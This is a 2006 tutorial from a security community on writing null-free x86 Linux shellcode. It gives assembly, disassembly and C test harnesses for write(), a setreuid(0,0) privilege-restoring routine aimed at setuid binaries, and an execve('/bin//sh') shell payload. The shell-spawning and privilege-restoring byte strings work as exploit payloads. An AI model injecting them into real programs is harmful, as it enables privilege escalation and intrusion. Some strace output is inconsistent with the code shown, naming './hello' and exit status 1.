Gotfault Security Community (GSC)

---------[ Chapter : 0x900                                 ]
---------[ Subject : Basic Shellcode Writing               ]
---------[ Author  : dx A.K.A. Thyago Silva                ]
---------[ Date    : 04/02/2006                            ]
---------[ Version : 1.0                                   ]

|=--------------------------------------------------------------------------=|

---------[ Table of Contents ]

  0x910 - Objective
  0x920 - Requisites
  0x930 - Introduction to Shellcode
  0x940 - Linux System Calls
  0x950 - X86 Registers
  0x960 - Common Assembly Instructions
  0x970 - write()
  0x980 - setreuid()
  0x990 - execve()
  0x9a0 - Conclusion

|=--------------------------------------------------------------------------=|

---------[ 0x910 - Objective ]

This paper gives an introduction to writing shellcode.

---------[ 0x920 - Requisites ]

Basic knowledge of C and assembly, and some experience with debugging tools
(gdb and objdump), are required.

---------[ 0x930 - Introduction to Shellcode ]

Shellcode is machine code that, when executed, typically spawns a shell.
Not all "shellcode" spawns a shell, though: the term has become a more
generic name for a piece of position-independent machine code that can be
executed directly by the CPU.

Shellcode usually cannot contain any null bytes, because it is commonly
handled as a C string, and a null byte stops the reading of the string.

Shellcode execution can be triggered by overwriting a return address on the
stack with the address of the injected shellcode.

---------[ 0x940 - Linux System Calls ]

In addition to the raw assembly instructions provided by the processor,
Linux provides the programmer with a set of functions that can easily be
invoked from assembly. These are known as system calls, and on 32-bit x86
they are triggered with a software interrupt (int $0x80). Each system call
is identified by a number; the list of numbers can be found in
/usr/include/asm/unistd.h.

Using a handful of assembly instructions and the system calls listed in
unistd.h, many different assembly programs and pieces of bytecode can be
written to perform many different functions.

---------[ 0x950 - X86 Registers ]

Registers are temporary storage locations used to hold data, addresses, or
the results of calculations. They are small storage areas on the CPU itself,
which makes access to their values extremely fast because the CPU does not
have to reach outside of itself.

The general-purpose 32-bit x86 registers can also be accessed as 16-bit and
8-bit parts.

  32 Bit    16 Bit    8 Bit (High)    8 Bit (Low)
  -------------------------------------------------
  EAX       AX        AH              AL
  EBX       BX        BH              BL
  ECX       CX        CH              CL
  EDX       DX        DH              DL

EAX, AX, AH and AL:
  * Are called the "Accumulator" registers.

EBX, BX, BH, and BL:
  * Are the "Base" registers.

ECX, CX, CH, and CL:
  * Are also known as the "Counter" registers.

EDX, DX, DH, and DL:
  * Are called the "Data" registers.

To execute a system call, you load these registers with the system call
number and its arguments. A very simple example is exit(0):

[xgc@knowledge:~/shellcode]$ more exit.s
.section .text
.global _start
_start:
        mov     $0x1, %al       # syscall number for exit
        xorl    %ebx, %ebx      # zero out EBX register
        int     $0x80           # changes to kernel mode

Assemble.

[xgc@knowledge:~/shellcode]$ as -o exit.o exit.s

Link.

[xgc@knowledge:~/shellcode]$ ld -o exit exit.o

Trace and disassemble.

[xgc@knowledge:~/shellcode]$ strace ./exit
execve("./exit", ["./exit"], [/* 18 vars */]) = 0
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ objdump -d exit

exit:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b0 01                   mov    $0x1,%al
 8048076:       31 db                   xor    %ebx,%ebx
 8048078:       cd 80                   int    $0x80

Note that writing AL leaves the upper 24 bits of EAX untouched, so this only
works when those bits are already zero, as they evidently are in this
standalone program. The later examples clear or fully load the register
first.

It is important to always use the smallest register that can hold your
data. This avoids NULL bytes in the shellcode. For example, suppose we used
the following exit code instead:

[xgc@knowledge:~/shellcode]$ more exit.s
.section .text
.global _start
_start:
        movl    $0x1, %eax      # syscall number for exit
        xorl    %ebx, %ebx      # zero out EBX register
        int     $0x80           # changes to kernel mode

Assemble.

[xgc@knowledge:~/shellcode]$ as -o exit.o exit.s

Link.

[xgc@knowledge:~/shellcode]$ ld -o exit exit.o

Trace and disassemble.

[xgc@knowledge:~/shellcode]$ strace ./exit
execve("./exit", ["./exit"], [/* 18 vars */]) = 0
_exit(0)                                = ?

Because the destination is the full 32-bit EAX register, the value 1 is
encoded as a 4-byte immediate, and the resulting code contains NULL bytes:

[xgc@knowledge:~/shellcode]$ objdump -d exit

exit:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b8 01 00 00 00          mov    $0x1,%eax
 8048079:       31 db                   xor    %ebx,%ebx
 804807b:       cd 80                   int    $0x80

---------[ 0x960 - Common Assembly Instructions ]

The following are some instructions that will be used in the construction
of shellcode.

------------------------------------------------------------------------------------
Instruction   Name/Syntax              Description
------------------------------------------------------------------------------------
MOV           Move instruction         Move the value from src into dest
              mov src, dest
------------------------------------------------------------------------------------
ADD           Add instruction          Used to add values
              add src, dest            Add the value in src to dest
------------------------------------------------------------------------------------
SUB           Subtract instruction     Used to subtract values
              sub src, dest            Subtract the value in src from dest
------------------------------------------------------------------------------------
PUSH          Push instruction         Used to push values to the stack
              push target              Push the value in target to the stack
------------------------------------------------------------------------------------
POP           Pop instruction          Used to pop values from the stack
              pop target               Pop a value from the stack into target
------------------------------------------------------------------------------------
JMP           Jump instruction         Used to change the EIP to a certain address
              jmp address              Change the EIP to the address in address
------------------------------------------------------------------------------------
CALL          Call instruction         Used like a function call, to change the
              call address             EIP to a certain address
                                       Push the address of the next instruction
                                       to the stack, and then change the EIP to
                                       the address in address
------------------------------------------------------------------------------------
LEA           Load effective address   Used to get the address of a piece of memory
              lea src, dest            Load the address of src into dest
------------------------------------------------------------------------------------
INT           Interrupt                Used to raise a software interrupt, which
              int value                transfers control to the kernel
                                       Raise the interrupt numbered value
------------------------------------------------------------------------------------

---------[ 0x970 - write() Example ]

Now some shellcode to print a string.

[xgc@knowledge:~/shellcode]$ man 2 write
WRITE(2)                  Linux Programmer's Manual                  WRITE(2)

NAME
       write - write to a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION
       write writes up to count bytes to the file referenced by the file
       descriptor fd from the buffer starting at buf. POSIX requires that a
       read() which can be proved to occur after a write() has returned
       returns the new data. Note that not all file systems are POSIX
       conforming.

write() takes the file descriptor as its first argument, which is an
integer. Standard output is file descriptor 1, so to print to the terminal
(STDOUT) this argument should be 1. The second argument is a pointer to a
character buffer containing the string to be written. The final argument is
the number of bytes to write from this buffer.

[xgc@knowledge:~/shellcode]$ grep __NR_write /usr/include/asm/unistd.h
#define __NR_write               4
[xgc@knowledge:~/shellcode]$ grep __NR_exit /usr/include/asm/unistd.h
#define __NR_exit                1

The system call number goes in EAX and the three arguments go in EBX, ECX
and EDX:

  write(int fd, const void *buf, size_t count);
  ---------------------------------------------
   EAX    EBX          ECX             EDX

        xorl    %ebx, %ebx      # zero out EBX register

The value of 4 needs to be put into the EAX register, because the write()
function is system call number 4.

        push    $0x4            # push the write syscall number onto the stack
        popl    %eax            # pop 0x4 from the stack into EAX

The address of the string needs to be put into ECX. Here the string is
built on the stack rather than in a data segment. Although write() is given
an explicit length, a NULL terminator is pushed first; since EBX = 0, it
can be used for that:

        pushl   %ebx            # push 0 (the terminator) onto the stack
        pushl   $0x0a0d4141     # push "AA\r\n" (stored little-endian)
        movl    %esp, %ecx      # ECX = stack pointer = address of the string

Then the value of 1 needs to be put into EBX, because the first argument of
write() is an integer representing the file descriptor (in this case
standard output, which is 1).

        incl    %ebx            # increment EBX from 0 to 1

And finally, the length of the string (in this case 4) needs to be put into
EDX.

        push    $0x4            # push 0x4 onto the stack
        popl    %edx            # pop 0x4 (the length) into EDX

After these registers are loaded, the system call interrupt is triggered,
which invokes write().

        int     $0x80           # changes to kernel mode

To exit cleanly, exit() needs to be called with a single argument of 0. So
the value of 1 needs to be put into EAX, because exit() is system call
number 1.

        xorl    %eax, %eax      # zero out EAX register
        incl    %eax            # increment EAX to 1

And the value of 0 needs to be put into EBX, because the first and only
argument should be 0. Then the system call interrupt is triggered one last
time.

        xorl    %ebx, %ebx      # zero out EBX register
        int     $0x80           # changes to kernel mode

So assemble, link, strace, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as write.s -o write.o
[xgc@knowledge:~/shellcode]$ ld write.o -o write
[xgc@knowledge:~/shellcode]$ strace ./write
execve("./hello", ["./hello"], [/* 18 vars */]) = 0
write(1, "AA\r\n", 4AA
)                   = 4
_exit(1)                                = ?
[xgc@knowledge:~/shellcode]$ ./write
AA
[xgc@knowledge:~/shellcode]$ objdump -d ./write

./hello:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 db                   xor    %ebx,%ebx
 8048076:       6a 04                   push   $0x4
 8048078:       58                      pop    %eax
 8048079:       53                      push   %ebx
 804807a:       68 41 41 0d 0a          push   $0xa0d4141
 804807f:       89 e1                   mov    %esp,%ecx
 8048081:       43                      inc    %ebx
 8048082:       6a 04                   push   $0x4
 8048084:       5a                      pop    %edx
 8048085:       cd 80                   int    $0x80
 8048087:       31 c0                   xor    %eax,%eax
 8048089:       31 db                   xor    %ebx,%ebx
 804808b:       40                      inc    %eax
 804808c:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

Create the shellcode string from the disassembly by turning the opcode
bytes into a C string. Each hex byte needs a '\x' in front of it.

I have:

        "\x31\xdb"              // xor %ebx, %ebx
        "\x6a\x04"              // push $0x4
        "\x58"                  // pop %eax
        "\x53"                  // push %ebx
        "\x68\x41\x41\x0d\x0a"  // push $0x0a0d4141
        "\x89\xe1"              // mov %esp, %ecx
        "\x43"                  // inc %ebx
        "\x6a\x04"              // push $0x4
        "\x5a"                  // pop %edx
        "\xcd\x80"              // int $0x80
        "\x31\xc0"              // xor %eax, %eax
        "\x31\xdb"              // xor %ebx, %ebx
        "\x40"                  // inc %eax
        "\xcd\x80";             // int $0x80

Put it in a test file, compile and run it.

[xgc@knowledge:~/shellcode]$ more write.c
#include <stdio.h>
#include <string.h>

char shellcode[] =
        "\x31\xdb"              // xor %ebx, %ebx
        "\x6a\x04"              // push $0x4
        "\x58"                  // pop %eax
        "\x53"                  // push %ebx
        "\x68\x41\x41\x0d\x0a"  // push $0x0a0d4141
        "\x89\xe1"              // mov %esp, %ecx
        "\x43"                  // inc %ebx
        "\x6a\x04"              // push $0x4
        "\x5a"                  // pop %edx
        "\xcd\x80"              // int $0x80
        "\x31\xc0"              // xor %eax, %eax
        "\x31\xdb"              // xor %ebx, %ebx
        "\x40"                  // inc %eax
        "\xcd\x80";             // int $0x80

int main(void)
{
        /* treat the byte array as a function and call it */
        int (*f)() = (int(*)())shellcode;
        printf("Length: %zu\n", strlen(shellcode));
        f();
        return 0;
}
[xgc@knowledge:~/shellcode]$ gcc -o write write.c
[xgc@knowledge:~/shellcode]$ ./write
Length: 26
AA
[xgc@knowledge:~/shellcode]$

This test harness assumes a 32-bit x86 Linux system on which the data
section is executable; where data pages are non-executable, the call into
the array will fault instead.

---------[ 0x980 - setreuid() Example ]

[xgc@knowledge:~/shellcode]$ man setreuid
SETREUID(2)               Linux Programmer's Manual               SETREUID(2)

NAME
       setreuid, setregid - set real and/or effective user or group ID

SYNOPSIS
       #include <sys/types.h>
       #include <unistd.h>

       int setreuid(uid_t ruid, uid_t euid);
       int setregid(gid_t rgid, gid_t egid);

DESCRIPTION
       setreuid sets real and effective user IDs of the current process.

Sometimes we need a "privilege restoration routine": code that restores a
process's root privileges when the process is still entitled to them but
has temporarily set them aside for security reasons. These routines are
especially useful when exploiting vulnerabilities in setuid binaries that
revert, but do not completely drop, their elevated privileges. setreuid is
one such routine; it sets the process's real and effective user IDs.

[xgc@knowledge:~/shellcode]$ grep __NR_setreuid /usr/include/asm/unistd.h
#define __NR_setreuid            70

We set EAX to 0x46 (70), the sys_setreuid system call number,

        push    $0x46           # push the setreuid syscall number onto the stack
        popl    %eax            # pop 0x46 from the stack into EAX

EBX to the real user ID,

        xorl    %ebx, %ebx      # zero out EBX register

and ECX to the effective user ID.

        xorl    %ecx, %ecx      # zero out ECX register
        int     $0x80           # changes to kernel mode

To exit cleanly, exit() needs to be called with a single argument of 0. So
the value of 1 needs to be put into EAX, because exit() is system call
number 1.

        xorl    %eax, %eax      # zero out EAX register
        incl    %eax            # increment EAX to 1

And the value of 0 needs to be put into EBX, because the first and only
argument should be 0. Then the system call interrupt is triggered one last
time.

        xorl    %ebx, %ebx      # zero out EBX register
        int     $0x80           # changes to kernel mode

So assemble, link, strace, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as setreuid.s -o setreuid.o
[xgc@knowledge:~/shellcode]$ ld setreuid.o -o setreuid
[xgc@knowledge:~/shellcode]$ strace ./setreuid
execve("./setreuid", ["./setreuid"], [/* 18 vars */]) = 0
setreuid(0, 0)                          = -1 EPERM (Operation not permitted)
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ ./setreuid
[xgc@knowledge:~/shellcode]$ objdump -d ./setreuid

./setreuid:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       6a 46                   push   $0x46
 8048076:       58                      pop    %eax
 8048077:       31 db                   xor    %ebx,%ebx
 8048079:       31 c9                   xor    %ecx,%ecx
 804807b:       cd 80                   int    $0x80
 804807d:       31 c0                   xor    %eax,%eax
 804807f:       40                      inc    %eax
 8048080:       31 db                   xor    %ebx,%ebx
 8048082:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

---------[ 0x990 - execve() Example ]

[xgc@knowledge:~/shellcode]$ man execve
EXECVE(2)                 Linux Programmer's Manual                 EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv [],
                  char *const envp[]);

This is the sweetest part. Based on what we've learned so far, let's try
writing shellcode that spawns an interactive shell. There's no need for an
exit() call, because an interactive program is being spawned.

Following the same convention as before, EBX holds the address of filename,
ECX holds the address of argv[] and EDX holds the address of envp[]. The
last two are arrays of pointers to strings.

The environment can be set to NULL, which means we can have a zero in EDX.
However, we need to supply at least argv[0], the name of the program. Since
argv[] must be NULL terminated, argv[1] will be zero.

So we'll need to:

  * have the string "/bin/sh" somewhere in memory
  * write the address of that string into EBX
  * create a char ** which holds the address of that "/bin/sh" string
    followed by a NULL
  * write the address of that char ** into ECX
  * write zero into EDX
  * trigger the interrupt to enter kernel mode

First write a NULL terminated "/bin/sh" into memory. We can do this by
pushing a NULL and then the string onto the stack.

Create a NULL in EAX. This will be used for terminating the string:

        xorl    %eax, %eax

Push that zero (NULL) onto the stack:

        pushl   %eax

Push "//sh". The doubled slash pads the path to 8 bytes, so it fills two
32-bit pushes without introducing a NULL byte; the kernel treats "//" like
"/":

        pushl   $0x68732f2f

Push "/bin":

        pushl   $0x6e69622f

At this moment, ESP points at the starting address of "/bin//sh". We can
safely write this into EBX:

        movl    %esp, %ebx

EAX is still zero. We can use it to terminate char **argv:

        pushl   %eax

If we push the address of "/bin//sh" onto the stack too, ESP will point at
the argv array of pointers. In this way, we have created char **argv in
memory:

        pushl   %ebx

And write the address of argv into ECX:

        movl    %esp, %ecx

EDX may happily be zero.

        xorl    %edx, %edx

sys_execve = 0xb. That should be in EAX, whose upper bytes are still zero:

        movb    $0xb, %al

Trigger the interrupt and enter kernel mode:

        int     $0x80

So assemble, link, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as execve.s -o execve.o
[xgc@knowledge:~/shellcode]$ ld execve.o -o execve
[xgc@knowledge:~/shellcode]$ ./execve
sh-2.05b$ exit
exit
[xgc@knowledge:~/shellcode]$ objdump -d ./execve

./execve:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0                   xor    %eax,%eax
 8048076:       50                      push   %eax
 8048077:       68 2f 2f 73 68          push   $0x68732f2f
 804807c:       68 2f 62 69 6e          push   $0x6e69622f
 8048081:       89 e3                   mov    %esp,%ebx
 8048083:       50                      push   %eax
 8048084:       53                      push   %ebx
 8048085:       89 e1                   mov    %esp,%ecx
 8048087:       31 d2                   xor    %edx,%edx
 8048089:       b0 0b                   mov    $0xb,%al
 804808b:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

Create the shellcode string from the disassembly by turning the opcode
bytes into a C string. Each hex byte needs a '\x' in front of it.

I have:

        "\x31\xc0"              // xor %eax, %eax
        "\x50"                  // push %eax
        "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
        "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
        "\x89\xe3"              // mov %esp, %ebx
        "\x50"                  // push %eax
        "\x53"                  // push %ebx
        "\x89\xe1"              // mov %esp, %ecx
        "\x31\xd2"              // xor %edx, %edx
        "\xb0\x0b"              // mov $0xb, %al
        "\xcd\x80";             // int $0x80

Put it in a test file, compile and run:

[xgc@knowledge:~/shellcode]$ more execve.c
#include <stdio.h>
#include <string.h>

char shellcode[] =
        "\x31\xc0"              // xor %eax, %eax
        "\x50"                  // push %eax
        "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
        "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
        "\x89\xe3"              // mov %esp, %ebx
        "\x50"                  // push %eax
        "\x53"                  // push %ebx
        "\x89\xe1"              // mov %esp, %ecx
        "\x31\xd2"              // xor %edx, %edx
        "\xb0\x0b"              // mov $0xb, %al
        "\xcd\x80";             // int $0x80

int main(void)
{
        /* treat the byte array as a function and call it */
        int (*f)() = (int(*)())shellcode;
        printf("Length: %zu\n", strlen(shellcode));
        f();
        return 0;
}
[xgc@knowledge:~/shellcode]$ gcc -o execve execve.c
[xgc@knowledge:~/shellcode]$ ./execve
Length: 25
sh-2.05b$

---------[ 0x9a0 - Conclusion ]

There are many ways to make shellcode smaller, and with shellcode, the
smaller the better. Using the logic described here, anyone can construct
countless pieces of shellcode. All it takes is a little attention.